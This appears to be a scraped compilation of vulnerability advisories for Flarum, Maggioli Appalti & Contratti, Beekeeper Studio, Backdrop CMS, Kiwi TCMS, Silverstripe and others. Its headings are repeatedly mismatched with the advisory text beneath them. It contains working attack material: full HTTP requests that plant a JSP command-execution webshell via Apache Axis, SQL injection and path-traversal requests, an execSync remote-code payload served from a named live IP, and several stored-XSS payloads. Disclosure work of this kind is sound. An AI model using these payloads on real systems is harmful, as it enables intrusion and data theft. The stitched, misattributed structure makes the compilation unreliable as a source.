Silverstripe silverstripe/framework through 4.11 allows XSS (issue 2 of 3).

**URL XSS vulnerability due to outdated jquery in CMS**

Moderate severity GitHub Reviewed Published Nov 21, 2022

GHSA-44xv-v98g-v79f: URL XSS vulnerability due to outdated jquery in CMS

Flarum's page title system allowed for page titles to be converted into HTML DOM nodes when pages were rendered. The change was made after `v1.5` and was not noticed.

This allowed an attacker to inject malicious HTML markup using a discussion title input, either by creating a new discussion or renaming one. The XSS attack occurs after a visitor opens the relevant discussion page.

### Impact
All communities running Flarum from `v1.5.0` to `v1.6.1` are impacted.

### Patches
The vulnerability has been fixed and published as flarum/core `v1.6.2`. All communities running Flarum from `v1.5.0` to `v1.6.1` have to upgrade as soon as possible to v1.6.2 using:

```
composer update --prefer-dist --no-dev -a -W
```

You can then confirm you run the latest version using:

```
composer show flarum/core
```

### Workarounds
**None.**

### For more information
For any questions or comments on this vulnerability please visit https://discuss.flarum.org/d/27558.

For support questions create a discussion at https://discuss.flarum.org/t/support.

A reminder that if you ever become aware of a security issue in Flarum, please report it to us privately by emailing [security@flarum.org](mailto:security@flarum.org), and we will address it promptly.


Flarum's page title system allowed for page titles to be converted into HTML DOM nodes when pages were rendered. The change was made after v1.5 and was not noticed.

This allowed an attacker to inject malicious HTML markup using a discussion title input, either by creating a new discussion or renaming one. The XSS attack occurs after a visitor opens the relevant discussion page.

**Impact**

All communities running Flarum from v1.5.0 to v1.6.1 are impacted.

**Patches**

The vulnerability has been fixed and published as flarum/core v1.6.2. All communities running Flarum from v1.5.0 to v1.6.1 have to upgrade as soon as possible to v1.6.2 using:

    composer update --prefer-dist --no-dev -a -W
    

You can then confirm you run the latest version using:

    composer show flarum/core
    

**Workarounds**

**None.**

**For more information**

For any questions or comments on this vulnerability please visit https://discuss.flarum.org/d/27558.

For support questions create a discussion at https://discuss.flarum.org/t/support.

A reminder that if you ever become aware of a security issue in Flarum, please report it to us privately by emailing security@flarum.org, and we will address it promptly.

**References**

*   GHSA-7x4w-j98p-854x
*   https://nvd.nist.gov/vuln/detail/CVE-2022-41938
*   flarum/framework@690de9c
*   https://discuss.flarum.org/d/27558

GHSA-7x4w-j98p-854x: Cross site scripting vulnerability with discussion titles

An issue was discovered in Appalti & Contratti 9.12.2. It allows Session Fixation. When a user logs in providing a JSESSIONID cookie that is issued by the server at the first visit, the cookie value is not updated after a successful login.

\# Authors: sababasecurity.com Red Team  
\# Vendor Homepage: https://www.maggioli.com

**I. INTRODUCTION**

The product “Appalti & Contratti,” is a modular platform consisting of several integrated web applications to support the Italian public administration in the computerized and telematic management of theirs process.

**II. DESCRIPTION**

**1\. Remote Code Execution through Apache Axis AdminService Exposed (CVE-2022-44784)**

The DL229 and LFS modules of “Appalti & Contratti” expose an Apache Axis 1.4 instance, when needed by the customer, under the respective paths https://host/DL229/services and https://host/LFS/services.  
The product is normally configured to expose a Reverse Proxy at port 443 in the same server that hosts all the application modules, that are instead served by Tomcat on a different port.  
Since the Reverse Proxy and the Tomcat instance serving the modules are in the same host, and the Reverse Proxy isn’t configured to exclude any route, it is possible to directly reach for the Apache Axis 1.4 AdminService as if the request is issued directly by the localhost. Any request is indeed received by the Reverse Proxy and then, from the Reverse Proxy is forwarded to the applications.  
The Apache Axis instance follows the default configuration, where the AdminService is only exposed to localhost:

confirming the assumption. The previous information has been leaked through the Local File Inclusion vulnerability, reachable by authenticated users, identified as CVE-2022-44786.  
When the Apache Axis AdminService is exposed, it is possible to create a LogHandler service that writes a jsp webshell in the application webroot, resulting in a Remote Code Execution.  
The complete details of the exploitation procedure are provided by Ambionics Security in their blog post “Oracle PeopleSoft Remote Code Execution: Blind XXE to SYSTEM Shell” (https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce#axis-update).  
Basically, the attack consists of exposing the “org.apache.axis.handlers.LogHandler” class as a service, to create a log file in the server webroot, writing to the log file through the service and, eventually, removing the service.  
The first two requests are shown below:

POST /MOD/services/AdminService HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: example.com
Content-Length: 1113

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<ns1:deployment
xmlns="http://xml.apache.org/axis/wsdd/"
xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"
xmlns:ns1="http://xml.apache.org/axis/wsdd/">
<ns1:service name="RandomService" provider="java:RPC">
<requestFlow>
<handler type="RandomLog"/>
</requestFlow>
<ns1:parameter name="className" value="java.util.Random"/>
<ns1:parameter name="allowedMethods" value="\*"/>
</ns1:service>
<handler name="RandomLog" type="java:org.apache.axis.handlers.LogHandler" > 
<parameter name="LogHandler.fileName" value="/opt/apache-tomcat-9.0.33/webapps/MOD/test\_sababa\_shell\_yu8Fyy23D7ZxPCeS.jsp" /> 
<parameter name="LogHandler.writeToConsole" value="false" /> 
</handler>
</ns1:deployment>
</soapenv:Body>
</soapenv:Envelope>

------------------------------------------------------

POST /MOD/services/RandomService HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: example.com
Content-Length: 1126

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://util.java">
<soapenv:Header/>
<soapenv:Body>
<util:ints soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<in0 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance"><!\[CDATA\[
<%@page import="java.util.\*,java.io.\*"%><% if (request.getParameter("p4WfhL16VokrRj1ss").equals("I41jqG\*XJ03@^KaO") && request.getParameter("D5e1U96oABaaq7BG") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("D5e1U96oABaaq7BG")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
\]\]></in0>
<in1 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance">?</in1>
</util:ints>
</soapenv:Body>
</soapenv:Envelope>

_**a. Business Impact**_

An attacker is capable of creating a jsp webshell directly in the webroot of the application, resulting in a Remote Code Execution.

**2\. Multiple SQL Injections (CVE-2022-44785)**

_**a. Unauthenticated SQL Injection**_

The web application modules “LFS”, “Vigilanza” and “DL229” implement the “GetListaEnti.do” functionality that accepts a URL parameter “cfamm”, which is subject to the mentioned vulnerability.  
By exploiting the issue on each application, it is possible to exfiltrate the entire content of each database in use.  
Since the underlying database is “Postgres”, it is possible to perform batched queries. This means that an attacker can perform multiple queries in the same statement.  
Consequently, an attacker could potentially introduce an “INSERT/DELETE/UPDATE” statement to change the database content, by properly manipulating the vulnerable parameter.  
Possible examples of the mentioned vulnerability are in the following URLs:

*   https://host/DL229/GetListaEnti.do?cfamm=F%27+UNION+ALL+SELECT+NULL%2cNULL%2cNULL%2d%2d
*   https://host/DL229/GetListaEnti.do?cfamm=F%27%3bSELECT+PG\_SLEEP%285%29%2d%2d

_**b. Authenticated time based SQL Injection**_

The web application modules “LFS”, “Vigilanza” and “DL229” are subject to multiple SQL Injections due to the way they create the parametrized SQL query to perform.  
More in detail, the “Trova.do” functionality at https://host/Vigilanza/Trova.do allows users to search for different resources, depending on the context the application is currently in.  
The search functionality allows to specify a variable number of “fields”, each of which is identified by a”defCampoN” POST body parameter, with N determining the number of the field in the search form.  
This field is composed of colon (i.e. “;”) separated strings. The first one of these is directly used as the column field of the “where” condition in the SQL parametrized query generated by the server.

Consequently, by directly replacing the column name with an arbitrary, nested, SQL statement, it is possible to perform an SQL Injection, as shown below:

POST /Vigilanza/Trova.do HTTP/1.1
Host: example.com
Cookie: JSESSIONID= 34F7164A1BF072446CB774A686C3CD1B
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 4360

jspPath=%2FWEB-INF%2Fpages%2Fgene%2Fimpr%2Fimpr-trova.jsp&jspPathTo=gene%2Fimpr%2Fimpr-lista.jsp&activePage=&isPopUp=0&numeroPopUp=&metodo=trova&entita=IMPR&filtro=&...\[snip\]...&Campo1\_where=&Campo1\_from=&Campo1\_computed=false&Campo1\_gestore=&Campo1\_conf=contiene&defCampo1=(SELECT+1+FROM+PG\_SLEEP(5))%3BT2000%3BN%3B&Campo1=...

The same behaviour also affects the “filtro” body parameter of the same POST request.

Analogously, the “Advanced search” allows to specify, for integer fields, whether to search for values “less than”, “greater than”, “equal to” the one specified by the user.  
This results in a POST body parameter like “Campo1\_conf” directly specifying the operator selected by the user, i.e. “<“, “>”, “=” respectively.  
The introduced parameter is directly used by the server to create the parametrized query to perform on the database.  
Consequently, by properly injecting an SQL construct as part of the “CampoX\_conf” parameter, it is possible to perform an SQL Injection attack.

POST /Vigilanza/Trova.do HTTP/1.1
Content-Length: 2372
Host: example.com
Cookie: JSESSIONID= 34F7164A1BF072446CB774A686C3CD1B
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

jspPath=%2FWEB-INF%2Fpages%2Fw9%2Fw9gara%2Fw9gara-trova.jsp&jspPathTo=w9%2Fw9gara%2Fw9gara-lista.jsp&...\[snip\]...&Campo1\_where=&Campo1\_from=&Campo1\_computed=false&Campo1\_gestore=&Campo1\_conf=%3D1+and+1+IN+(SELECT+1+FROM+PG\_SLEEP(3))+OR+1%3C%3E&...\[snip\]...

In a similar way, the POST request to https://host/DL229/ApriPagina.do is used to perform a search request and, in the “trovaAddWhere” body parameter, it is sent part of the SQL statement that will be embedded into the parametrized query that is performed.

POST /DL229/ApriPagina.do?\_csrf=0TM8-4VQG-B1K7-RD4D-MIMU-1FH3-IAQW-OYD1 HTTP/1.1
Host: example.com
Cookie: JSESSIONID=481BA32AF2A220443F35C52A1935D4D4
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 281

href=dl229%2Fprog\_anag%2Fprog\_anag-lista.jsp&entita=PROG\_ANAG&trovaFrom=PROG\_ANAG&trovaAddWhere=%28PROG\_ANAG.PROGETTO\_ARCHIVIATO+%3C%3E+%3F+AND+1+IN+(SELECT+1+FROM+PG\_SLEEP(3))&trovaParameter=T%3A1&risultatiPerPagina=20&\_csrf=0TM8-4VQG-B1K7-RD4D-MIMU-1FH3-IAQW-OYD1

_**c. Business Impact**_

An attacker can exploit the mentioned flaws to dump the entire database content. Alternatively, it is possible to perform INSERT/UPDATE/DELETE statements due to the support of batched queries from Postgre SQL, which is trivial for the unauthenticated case.

**3\. Local File Inclusion (CVE-2022-44786)**

The “ApriPagina.do” main landing page of each module, strongly relies on the “href” URL parameter to decide which “jsp” page to include.  
The “jsp” page is indeed directly embedded by the “ApriPagina.do” endpoint and directory traversal is also accepted and not sanitized in any way.

However, by trying to access any non “jsp” content, the server answers with an error message.  
In order to bypass this, it is possible to access “hrefs” like the following: “..;/..;/WEB-INF/web.xml;index.jsp”.  
The final URL to dump the “WEB-INF/web.xml” file is something like:

*   https://host/DL229/ApriPagina.do?href=..;/..;/WEB-INF/web.xml;index.jsp

This happens because, likely, the sanitization procedure checks that the URL refers to a “jsp” page which, for the mentioned “href”, is true.  
However, Apache Tomcat, the underlying servlet container, parses the web path provided and , for each part, considers anything after the “;” to be a parameter and automatically strips it.  
In other words, what is actually accessed is the final “href” of “../../WEB-INF/web.xml”, successfully retrieving the “web.xml” configuration file of the web application, as shown below.

_**a. Business Impact**_

An attacker can dump several Class files and known XML configuration files, retrieving useful internal details about the software.  
In general, it is possible to download arbitrary files (except for “jsp” pages) that are under the root of the affected module.

**4\. Reflected Cross-Site Scripting (CVE-2022-44787)**

The web application modules are vulnerable to a Reflected Cross-Site Scripting issue in the specific “ApriPopup.do” endpoint, as follows:

*   https://host/Vigilanza/ApriPopup.do?href=commons%5chelpDiPagina.jsp&idPagina=W9.W9GARA-test+%3cdiv+style%3d%27height:1000px;width:1000px%27+onmouseenter%3d%27alert%28document.location%29%27%3e&numeroPopUp=1
*   https://host/LFS/ApriPopup.do?href=commons%5chelpDiPagina.jsp&idPagina=W9.W9GARA-test+%3cdiv+style%3d%27height:1000px;width:1000px%27+onmouseenter%3d%27alert%28document.location%29%27%3e&numeroPopUp=1
*   https://host/DL229/ApriPopup.do?href=commons%5chelpDiPagina.jsp&idPagina=W9.W9GARA-test+%3cdiv+style%3d%27height:1000px;width:1000px%27+onmouseenter%3d%27alert%28document.location%29%27%3e&numeroPopUp=1

More in detail, the “idPagina” parameter is reflected inside the server response without any HTML encoding, resulting in a Reflected Cross-Site Scripting attack when the victim moves the mouse pointer inside the page.  
The target endpoint, actually, does seem to perform some sort of sanitization, removing some malicious tags and attributes, however, not all attributes are correctly sanitized.  
As an example, the “onmouseenter” attribute used in the mentioned payload is not sanitized, resulting in a Cross-Site Scripting attack.

_**a. Business Impact**_

An attacker can send a malicious link to a designated victim and execute Javascript code in the context of the victim’s authenticated session.

**5\. JSESSIONID Session Fixation (CVE-2022-44788)**

Session Fixation is an attack that permits an attacker to hijack a valid user session.  
The attack exploits a limitation in the way the web application manages the session ID, more specifically the vulnerable web application, when authenticating a user, doesn’t assign a new session ID, making it possible to use an existing one.  
Consequently, the attack consists of obtaining a valid session ID (e.g. by connecting to the application),inducing a user to authenticate himself with that session ID, and then hijacking the user-validated session by the knowledge of the used session ID.

The target web applications are subject to the mentioned issue since, when the user logs in providing the “JSESSIONID” cookie that is issued by the server at the first visit, the cookie value is not updated after a successful login.

_**a. Business Impact**_

An attacker that manages to exfiltrate the JSESSIONID of an unauthenticated user can hijack the user session when the victim authenticates successfully.

**III. SYSTEM AFFECTED**

All modules prior to the following versions are vulnerable: DL229 v4.2.4, LFS v9.48.1, FEU v4.12.1, Appalti v9.12.2.

**IV. VULNERABILITY HISTORY**  
Sep 02th, 2022: Vendor notification  
Oct 04th, 2022: Vendor fixed the issues

**V. LEGAL NOTICES**  
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.

CVE-2022-44788: Maggioli Appalti & Contratti, Multiple Vulnerabilities - BackBox.org Membership

A cross-site scripting (XSS) vulnerability in Beekeeper Studio v3.6.6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the error modal container.

**Author: bob11.devranger@gmail.com**

**Date: 2022-10-07**

**OS: Windows, Linux, MacOS**

**Beekeeper Studio Version: 3.6.6**

**DB Type&Version: MySQL 5.7 and 8.0 Also**

**Summary**

It has been possible to trigger remote code execution via Beekeeper’s **Modal Container**.

**Description**

Beekeeper has the modal container which indicates the user’s interaction is valid and due to a lack of sanitization of the modal contents, It has an XSS vulnerability like this:

_\[1\]_  
  

_\[2\]_  
  

The modal’s content also is transferred by MySQL packet when only the user’s interaction is invalid like this:  

So, Taking advantage of the report in CVE-2022-26174, it has been possible Remote Code Execution via Modal Container.

In this case, I made the fake MySQL server which spoofs user’s modal output when the user puts some data in a table.

This is my sample fake SQL server : poc.py

You can see this poc video that fake SQL server triggers RCE via Beekeeper.

PoC\_Video

In this video, I used this XSS script <input type="text" onfocus="require('child_process').execSync('calc.exe')" autofocus /> for modal error output and any input that user passes is replaced by that XSS script and re-passed to the user.

Finally, Malicious Code is triggered in the user’s PC and is continued until the modal is inactivated.

**What’s More?**

*   Not only data inserting functions but also any functions which use error modal(e.g. create table), It seems that we can trigger RCE too.

**Temporary Fake SQL Server**

146.56.129.188:3306

*   You can do these poc in this fake SQL server with Beekeeper
*   If you have any problems, contact me via **a42873410@gmail.com** or **bob11.devranger@gmail.com**
*   Thank You :)

CVE-2022-43143: BUG: Beekeeper Remote Code Execution via XSS · Issue #1393 · beekeeper-studio/beekeeper-studio

Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content.

**Backdrop CMS version 1.23.0****Vulnerability Explanation:**

Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Post content.

**Attack Vectors:**

The attacker must post something on the "Post content" and insert the XSS payload at the "Body" input, and pick the Raw HTML Editor in order to exploit the stored XSS. The XSS payload will be launched immediately after save.

**Affected:**

*   http://ip\_address/backdrop/node/add/post
    
*   POST /backdrop/node/add/post
    

**Payload :**

*   <img src=x onerror=confirm('Grim-The-Ripper-Team-by-SOSECURE-Thailand')>

**Tested on:**

1.  Backdrop CMS version 1.23.0 (https://github.com/backdrop/backdrop/releases/tag/1.23.0)
    
2.  Firefox version 105
    

**Steps to attack:**

1.  Enter your username and password; the account must have admin privileges.
2.  Select Content > add content > Post
3.  Enter information into the form provided.
4.  Enter the XSS payload in the Body field.
5.  Choose "Raw HTML" Editor and Save.
6.  The XSS payload will run immediately.

**Discoverer:**

 Grim The Ripper Team by SOSECURE Thailand

**Medium:**

**Disclosure Timeline:**

*   2022–09–27: Vulnerability discovered.
*   2022–09–27: Vulnerability reported to the MITRE corporation.
*   2022–10–15: CVE has been reserved.
*   2022–10–31: Public disclosure of the vulnerability.

Reference:

3.  https://github.com/backdrop/backdrop/releases/tag/1.23.0
    
4.  https://backdropcms.org

CVE-2022-42096: GitHub - bypazs/CVE-2022-42096: Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Post content.

A stored XSS in a kiwi Test Plan can run malicious javascript which could be chained with an HTML injection to perform a UI redressing attack (clickjacking) and an HTML injection which disables the use of the history page.

**Description**

Stored XSS, also known as persistent XSS, is the more damaging of the XSS. It occurs when a malicious script is injected directly into a vulnerable web application. Due to a sanitization problem it is possible to perform both a Stored XSS and an HTML injection. Thanks to this attack it is possible to disable the history page making it unusable (for example I created a transparent page above with an infinite redirect), or it is possible to create a stored XSS.

The problem is that the markdown input is sanitized in the TestPlan, but it is not sanitized by the history page. On the history page it will run.

**Proof of Concept**

1 - Insert one of the following payloads into a Test Plan.

2 - Go to the history

**Stored XSS:**

    <a href="https://evil.com/users/signin" onmouseover="confirm(document.cookie)" style="position: fixed; top: 0; right: 0; width: 10000px; height: 10040px; opacity:0.00001;">foo</a>
    
    

**Stored HTML Injection - Disable the history page:**

    <a href='https://evil.com/users/signin' style='position: fixed; top: 0; right: 0; width: 10000px; height: 10040px; opacity:0.00001;'>foo</a>
    

**POC Video (Payload execution):**

https://drive.google.com/file/d/1n7ZSrOOIb47vZro4ck2-hPRkzbSiX8CF/view?usp=sharing

**Update:**

I made a video where a basic user (not an admin) creates a testplan. When Admin goes into the history of the testplan created by the basic user, the XSS will appear (stored blind XSS)

**POC:**

https://drive.google.com/file/d/1FlGvATGWKWXXoMB6h2Z-JOX1gVhkssx5/view?usp=share\_link

**Impact**

Stored XSS to run malicious javascript.

2.  HTML Injection to perform a UI redressing attack (clickjacking)
3.  HTML injection which disables the use of the history page

CVE-2022-4105: Stored XSS and HTML injection from markdown  in kiwi

Sourcecodester Password Storage Application in PHP/OOP and MySQL 1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the Name, Username, Description and Site Feature parameters.

\[Suggested description\] Sourcecodester Password Storage Application in PHP/OOP and MySQL 1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the Name, Username, Description and Site Feature parameters.

\[Additional Information\] Proof Of Concept: https://drive.google.com/file/d/1ZmAuKMVzUpL8pt5KXQJk8IyPECoVP9xw/view?usp=sharing Vendor Homepage: https://www.sourcecodester.com/php/15726/password-storage-application-phpoop-and-mysql-free-source-code.html Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/psa\_php.zip

\[Vulnerability Type\] Cross Site Scripting (XSS)

\[Vendor of Product\] Sourcecodester

\[Affected Product Code Base\] Password Storage Application in PHP/OOP and MySQL - 1.0

\[Affected Component\] Source Code

\[Attack Type\] Remote

\[Impact Code execution\] true

\[Attack Vectors\] to Exploit this vulnerability attacker need to first create his account on http://localhost/psa\_php/owner\_registration.php, then login with created password after login, attacker need to inject arbitrary JavaScript code inside Name, Username, Description and Site field, and then click on save, once attacker clicks on save button the arbitrary JavaScript Payload will Execute

\[Reference\] https://www.sourcecodester.com/php/15726/password-storage-application-phpoop-and-mysql-free-source-code.html https://drive.google.com/file/d/1ZmAuKMVzUpL8pt5KXQJk8IyPECoVP9xw/view?usp=sharing

\[Discoverer\] RashidKhan Pathan

CVE-2022-43117: GitHub - RashidKhanPathan/CVE-2022-43117

**This site requires you to update your browser.** Your browsing experience maybe affected by not having the most up to date version.

Severity:

Medium (?)

Identifier:

CVE-2022-38146

Versions Affected:

silverstripe/admin: ^1.0.0

Versions Fixed:

silverstripe/admin: ^1.11.3

Release Date:

2022-11-21

The Silverstripe CMS UI uses jQuery 1.7.2. This version of jQuery is affected by CVE-2019-11358 Object.prototype pollution. An attacker could perform an XSS attack by convincing a user to follow a link with a specially crafted __proto__ query string parameter.

_silverstripe/admin_ 1.11.3 addresses this problem by stopping all JavaScript execution if a __proto__ query string is present in the URL. This fix is just a stopped gap measure.

This issue will be properly remediated by upgrading to jQuery 3.6.1 or later in the Silverstripe CMS 4.12.0 release.

Most projects should be able to apply the patch without further work. There's no legitimate use case for this behaviour.

Regression testing should focus on custom CMS UI functionality that might be implemented in your project.

If you use the jQuery version distributed with Silverstripe CMS in the front end of your site, you may be affected by this vulnerability via the front end. If this applies to youp project, you should upgrade your theme to use a more recent jQuery version.

**Base CVSS:** 5.4

**Reported by:** Trong Pham via huntr.dev

CVE-2022-38146: CVE-2022-38146 URL XSS vulnerability due to outdated jquery in CMS

Phpgurukul Blood Donor Management System 1.0 allows Cross Site Scripting via Add Blood Group Name Feature.

CVE-2022-40470

** UNSUPPORTED WHEN ASSIGNED ** missing input validation in Apache Hama may cause information disclosure through path traversal and XSS. Since Apache Hama is EOL, we do not expect these issues to be fixed.

**Email display mode:**

Modern rendering  
Legacy rendering

Tag

#xss